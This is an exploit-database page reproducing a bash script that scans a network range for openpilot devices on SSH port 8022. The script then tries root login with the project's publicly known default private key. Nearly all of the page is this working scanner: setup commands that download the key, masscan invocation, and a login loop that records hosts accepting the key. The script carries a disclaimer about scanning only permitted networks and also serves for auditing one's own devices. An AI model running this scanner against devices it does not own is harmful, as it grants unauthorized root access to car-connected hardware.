Advertisement






Openpilot Default SSH Key Scanner

CVE Category Price Severity
N/A CWE-798 N/A High
Author Risk Exploitation Type Date
Exploit Alert Team High Remote 2020-12-31
CPE
cpe:cpe:/a:openpilot:ssh_key_scanner
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020120194

Below is a copy:

Openpilot Default SSH Key Scanner
#!/bin/bash
#
# openpilot-scan.sh
#
# Jeremy Brown [jbrown3264/gmail]
# Dec 2020
#
# Checks for openpilot devices using the default SSH key
#
# Setup
# > apt-get install -y masscan && setcap cap_net_raw=ep /usr/bin/masscan
# > wget -q https://raw.githubusercontent.com/commaai/openpilot/master/tools/ssh/id_rsa
# > chmod 600 id_rsa
#
# Example
# > ./openpilot-scan.sh 10.100.100.1/24
#
# Disclaimer
# This script will port scan and attempt login to SSH servers which accept a
# given key. Use it at your own risk, no guarentees, only scan your own network
# or those that you have permission to scan. You assume full responsibility
# for any use or execution of these tools, authorized entry or otherwise actions.
#

KEY="id_rsa"
MATCH_IP='[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'
MASSCAN_LOG="masscan.log"
SCAN_LOG="scan.log"
FOUND_FILE="found.txt"
SSH_PORT=8022
USER="root"

if [ $# -ne 1 ]; then
    echo "usage: ./openpilot-scan.sh ra.n.g.e/24"
    exit 1
fi

# scan
masscan --open -p $SSH_PORT -oL $MASSCAN_LOG $1 >/dev/null 2>&1

# parse
grep -ohP "$MATCH_IP" $MASSCAN_LOG > $SCAN_LOG

# check
while read IP
do
    ssh $USER@$IP \
    -p $SSH_PORT \
        -o batchmode=yes \
        -o StrictHostKeyChecking=no \
        -T -i $KEY >/dev/null 2>&1

    if [ $? -ne 255 ]; then
    echo $IP
        echo $IP >> $FOUND_FILE
    fi

done < $SCAN_LOG

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.